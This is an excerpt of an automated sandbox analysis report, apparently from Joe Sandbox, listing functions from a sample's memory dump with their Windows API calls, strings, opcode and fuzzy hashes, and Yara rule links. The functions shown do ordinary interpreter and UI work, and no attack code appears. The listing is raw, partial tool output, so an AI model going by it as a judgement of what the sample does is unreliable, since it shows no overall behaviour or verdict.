                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E9B37F
                                                                                                          • GetParent.USER32(?), ref: 00E9B39D
                                                                                                          • ScreenToClient.USER32(00000000), ref: 00E9B3A4
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E9B41E
                                                                                                          • _wcscmp.LIBCMT ref: 00E9B432
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00E9B458
                                                                                                          • _wcscmp.LIBCMT ref: 00E9B46C
                                                                                                            • Part of subcall function 00E6385C: _iswctype.LIBCMT ref: 00E63864
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                          • String ID: %s%u
                                                                                                          • API String ID: 3744389584-679674701
                                                                                                          • Opcode ID: a3af357bac938d9d2a6a1f9e68695413b41e942bbd776e8766f81f1879de540c
                                                                                                          • Instruction ID: ac9a9aee95ee2a3cfbd8af0da6e17a5d75a8534633d03ff16f4e76881daae830
                                                                                                          • Opcode Fuzzy Hash: a3af357bac938d9d2a6a1f9e68695413b41e942bbd776e8766f81f1879de540c
                                                                                                          • Instruction Fuzzy Hash: 62A10471204306AFDB14DF20E984FEAB7E8FF44358F00552AF9A9E6191E730E955CB91
                                                                                                          Function 00E9BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00E9BAB1
                                                                                                          • _wcscmp.LIBCMT ref: 00E9BAC2
                                                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E9BAEA
                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00E9BB07
                                                                                                          • _wcscmp.LIBCMT ref: 00E9BB25
                                                                                                          • _wcsstr.LIBCMT ref: 00E9BB36
                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E9BB6E
                                                                                                          • _wcscmp.LIBCMT ref: 00E9BB7E
                                                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E9BBA5
                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E9BBEE
                                                                                                          • _wcscmp.LIBCMT ref: 00E9BBFE
                                                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00E9BC26
                                                                                                          • GetWindowRect.USER32(00000004,?), ref: 00E9BC8F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                          • String ID: @$ThumbnailClass
                                                                                                          • API String ID: 1788623398-1539354611
                                                                                                          • Opcode ID: ff197c41562815ac77cdccc6244642ea8bfb37c2095305d86391d7b20d8d13cb
                                                                                                          • Instruction ID: 524e00cc46b7d74217fe9063fce57216ab3426125de94f5d2c05ff8ce57eca6b
                                                                                                          • Opcode Fuzzy Hash: ff197c41562815ac77cdccc6244642ea8bfb37c2095305d86391d7b20d8d13cb
                                                                                                          • Instruction Fuzzy Hash: 8581A4710043059FDF04DF14EA85FAAB7D8EF44318F14A56AFD85AA096EB30DD49CB61
                                                                                                          Function 00E9B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                          • API String ID: 1038674560-1810252412
                                                                                                          • Opcode ID: af96f61da65acc718084a4322a008251ef6abf2fde9c045592c76905b367463c
                                                                                                          • Instruction ID: 2144dd6cbe807a9b15861a18850cdf1084bba4c5b555a83115a944a39815e64b
                                                                                                          • Opcode Fuzzy Hash: af96f61da65acc718084a4322a008251ef6abf2fde9c045592c76905b367463c
                                                                                                          • Instruction Fuzzy Hash: 9E31BE70A80309A6CE14FAA0EE43FBD73F4AF10791F642529FA55B50D1EB566E08C652
                                                                                                          Function 00E9CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(00000063), ref: 00E9CBAA
                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E9CBBC
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00E9CBD3
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00E9CBE8
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00E9CBEE
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00E9CBFE
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00E9CC04
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E9CC25
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E9CC3F
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E9CC48
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00E9CCB3
                                                                                                          • GetDesktopWindow.USER32 ref: 00E9CCB9
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00E9CCC0
                                                                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E9CD0C
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E9CD19
                                                                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E9CD3E
                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E9CD69
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                          • String ID:
                                                                                                          • API String ID: 3869813825-0
                                                                                                          • Opcode ID: dac891226ee0e3cf364c51fb7038dc3a5537582ac9f271221728b420f4a469a1
                                                                                                          • Instruction ID: c3ec8b2b514daa253bd03706ce9bf4496488c0dec6b660e97506fb0e20cbe981
                                                                                                          • Opcode Fuzzy Hash: dac891226ee0e3cf364c51fb7038dc3a5537582ac9f271221728b420f4a469a1
                                                                                                          • Instruction Fuzzy Hash: 13518D70900709AFDB20EFA9DE89B6EBBF5FF44709F100919E556B25A0D770E914CB50
                                                                                                          Function 00ECA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00ECA87E
                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 00ECA8F8
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00ECA972
                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00ECA994
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ECA9A7
                                                                                                          • DestroyWindow.USER32(00000000), ref: 00ECA9C9
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E40000,00000000), ref: 00ECAA00
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ECAA19
                                                                                                          • GetDesktopWindow.USER32 ref: 00ECAA32
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00ECAA39
                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00ECAA51
                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00ECAA69
                                                                                                            • Part of subcall function 00E429AB: GetWindowLongW.USER32(?,000000EB), ref: 00E429BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                          • String ID: 0$tooltips_class32
                                                                                                          • API String ID: 1297703922-3619404913
                                                                                                          • Opcode ID: e5721ce820abaee70a860997459c50c1bf5073a8f772c449880bf5b922916af2
                                                                                                          • Instruction ID: 5834406a87e30c19a6630797b7dbdd2db5429b625ec89975795140cbac217eac
                                                                                                          • Opcode Fuzzy Hash: e5721ce820abaee70a860997459c50c1bf5073a8f772c449880bf5b922916af2
                                                                                                          • Instruction Fuzzy Hash: 3071A770140348AFD721DF28DD09F6A77E5FB88308F18452DF986A72A1D772E906DB52
                                                                                                          Function 00ECCCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00ECCCCF
                                                                                                            • Part of subcall function 00ECB1A9: ClientToScreen.USER32(?,?), ref: 00ECB1D2
                                                                                                            • Part of subcall function 00ECB1A9: GetWindowRect.USER32(?,?), ref: 00ECB248
                                                                                                            • Part of subcall function 00ECB1A9: PtInRect.USER32(?,?,00ECC6BC), ref: 00ECB258
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00ECCD38
                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00ECCD43
                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00ECCD66
                                                                                                          • _wcscat.LIBCMT ref: 00ECCD96
                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00ECCDAD
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00ECCDC6
                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00ECCDDD
                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00ECCDFF
                                                                                                          • DragFinish.SHELL32(?), ref: 00ECCE06
                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00ECCEF9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                          • API String ID: 169749273-3440237614
                                                                                                          • Opcode ID: 17d68401c6084adb0373c0e0eeff8ee37260854e4dbe0b8c14f070277b0796c8
                                                                                                          • Instruction ID: 22fcf57f00ace69066a4936f44b30bfb0d1cbf2d21e967bdc683f66653354002
                                                                                                          • Opcode Fuzzy Hash: 17d68401c6084adb0373c0e0eeff8ee37260854e4dbe0b8c14f070277b0796c8
                                                                                                          • Instruction Fuzzy Hash: 10618F71508301AFC711EF50EC85E9FBBE8EFC8750F101A1EF695A61A1DB31AA49CB52
                                                                                                          Function 00EA82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00EA831A
                                                                                                          • VariantCopy.OLEAUT32(00000000,?), ref: 00EA8323
                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 00EA832F
                                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00EA841D
                                                                                                          • __swprintf.LIBCMT ref: 00EA844D
                                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00EA8479
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EA852A
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00EA85BE
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EA8618
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EA8627
                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00EA8665
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                          • API String ID: 3730832054-3931177956
                                                                                                          • Opcode ID: 8c600ca48b6bebe8d5375d6ab96036d548ad3b3b366ece6d13c55b70dc36e3c9
                                                                                                          • Instruction ID: 5d8ff6caee58ab48396353191db65c5ef0e4f8aae6fa0630fd3aef10e274e225
                                                                                                          • Opcode Fuzzy Hash: 8c600ca48b6bebe8d5375d6ab96036d548ad3b3b366ece6d13c55b70dc36e3c9
                                                                                                          • Instruction Fuzzy Hash: 75D1BD71A04515EBDF209F61D984BAEB7B4FF4AB01F14A556E815BF280DF30B848DBA0
                                                                                                          Function 00EC49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EC4A61
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC4AAC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                          • API String ID: 3974292440-4258414348
                                                                                                          • Opcode ID: 33d9080a74977da5ba21ddd1db243fba5f91e5868b365cc829478c4de0d09e4a
                                                                                                          • Instruction ID: 28ac39782cf51ba5bcfa19bf3acab744f763b121d14d312f3711913d11d87bb3
                                                                                                          • Opcode Fuzzy Hash: 33d9080a74977da5ba21ddd1db243fba5f91e5868b365cc829478c4de0d09e4a
                                                                                                          • Instruction Fuzzy Hash: 90915AB02046119BCB04EF20D561F6AB7E1AF94354F14A95CF8967B3E2DB31ED4ACB81
                                                                                                          Function 00EAE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00EAE31F
                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EAE32F
                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EAE33B
                                                                                                          • __wsplitpath.LIBCMT ref: 00EAE399
                                                                                                          • _wcscat.LIBCMT ref: 00EAE3B1
                                                                                                          • _wcscat.LIBCMT ref: 00EAE3C3
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EAE3D8
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EAE3EC
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EAE41E
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EAE43F
                                                                                                          • _wcscpy.LIBCMT ref: 00EAE44B
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EAE48A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 3566783562-438819550
                                                                                                          • Opcode ID: ed966cbf2f41e00d9111d370272948ad6ba499165a973281869d5448086f35e6
                                                                                                          • Instruction ID: f5948dfca72903e602237e9efcf67b562020b98deb83954407edceb83531ad22
                                                                                                          • Opcode Fuzzy Hash: ed966cbf2f41e00d9111d370272948ad6ba499165a973281869d5448086f35e6
                                                                                                          • Instruction Fuzzy Hash: 26618AB25043059FC710EF60D844A9EB7E8FF89314F04991EF989AB251DB35F909CB92
                                                                                                          Function 00E423F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E41F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E42412,?,00000000,?,?,?,?,00E41AA7,00000000,?), ref: 00E41F76
                                                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E424AF
                                                                                                          • KillTimer.USER32(-00000001,?,?,?,?,00E41AA7,00000000,?,?,00E41EBE,?,?), ref: 00E4254A
                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00E7BFE7
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E41AA7,00000000,?,?,00E41EBE,?,?), ref: 00E7C018
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E41AA7,00000000,?,?,00E41EBE,?,?), ref: 00E7C02F
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E41AA7,00000000,?,?,00E41EBE,?,?), ref: 00E7C04B
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00E7C05D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                          • String ID: h
                                                                                                          • API String ID: 641708696-1717268160
                                                                                                          • Opcode ID: 9e9c83ca747aa79cbd0a31966f2817ba85d80ee21c4e64cba07b830ce9bbe853
                                                                                                          • Instruction ID: d3873cbd973514d5711f1ebd4809d1e26d2e5b9b0cc437141f176b6e04e9fba2
                                                                                                          • Opcode Fuzzy Hash: 9e9c83ca747aa79cbd0a31966f2817ba85d80ee21c4e64cba07b830ce9bbe853
                                                                                                          • Instruction Fuzzy Hash: 0A61BB30905704DFCB25AF14E948B2A77F1FB4031AF64A56DE156BA960C371BC90EF91
                                                                                                          Function 00EAA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EAA2C2
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EAA2E3
                                                                                                          • __swprintf.LIBCMT ref: 00EAA33C
                                                                                                          • __swprintf.LIBCMT ref: 00EAA355
                                                                                                          • _wprintf.LIBCMT ref: 00EAA3FC
                                                                                                          • _wprintf.LIBCMT ref: 00EAA41A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 311963372-3080491070
                                                                                                          • Opcode ID: 8dfe506b51482b47d36002903c071a5f5759e199b3a356a19eb3f9e5d58a77c1
                                                                                                          • Instruction ID: ce5252f5f3fb23b5e2292e6bda864222aaf7819e1cd5f9ecb7eff4390e025a47
                                                                                                          • Opcode Fuzzy Hash: 8dfe506b51482b47d36002903c071a5f5759e199b3a356a19eb3f9e5d58a77c1
                                                                                                          • Instruction Fuzzy Hash: 9D51B171900209AACF14EBE0DD46EEEB7B9AF09341F1415A5F905B2062EB352F58DB61
                                                                                                          Function 00EA0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,00E8F8B8,00000001,0000138C,00000001,00000002,00000001,?,00EB3FF9,00000002), ref: 00EA009A
                                                                                                          • LoadStringW.USER32(00000000,?,00E8F8B8,00000001), ref: 00EA00A3
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00F07310,?,00000FFF,?,?,00E8F8B8,00000001,0000138C,00000001,00000002,00000001,?,00EB3FF9,00000002,00000001), ref: 00EA00C5
                                                                                                          • LoadStringW.USER32(00000000,?,00E8F8B8,00000001), ref: 00EA00C8
                                                                                                          • __swprintf.LIBCMT ref: 00EA0118
                                                                                                          • __swprintf.LIBCMT ref: 00EA0129
